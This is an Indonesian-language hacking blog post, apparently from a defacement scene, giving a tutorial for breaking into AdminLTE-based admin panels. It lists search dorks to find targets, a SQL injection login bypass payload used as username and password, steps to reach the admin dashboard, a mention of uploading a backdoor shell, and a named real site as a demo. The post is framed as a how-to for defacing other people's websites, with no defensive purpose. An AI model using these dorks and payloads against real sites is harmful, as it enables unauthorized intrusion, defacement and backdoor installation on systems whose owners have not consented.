Halo sobat hwkwr kali ini mimin share tutor deface lagi yaitu Proof Of Concept :
Deface Metode Login Form AdminLTE (Vulnerability Bypass SQL Login)
Dimana Kerentanan Keamanan website terjadi pada admin login, kesalahan progremer dalam koding web etc, sehingga dapat kita bypass..
Bahan Bahan :
- Dork :
- intitle:adminLTE inurl:admin
- intitle:adminLTE inurl:login intext:username
- Shell Backd00R / JSO
- Brain
- Browser / Internet
Username/password: :
' or 1=1 limit 1 -- -+
1) Seperti biasa dorking, pilih site menurut kalian vuln
2) masukkan u/p nya lalu login
3) sukses? Kalian nanti akan dibawakan ke dashboard admin :D
Demo : sisekar.com/
Tags
DEFACE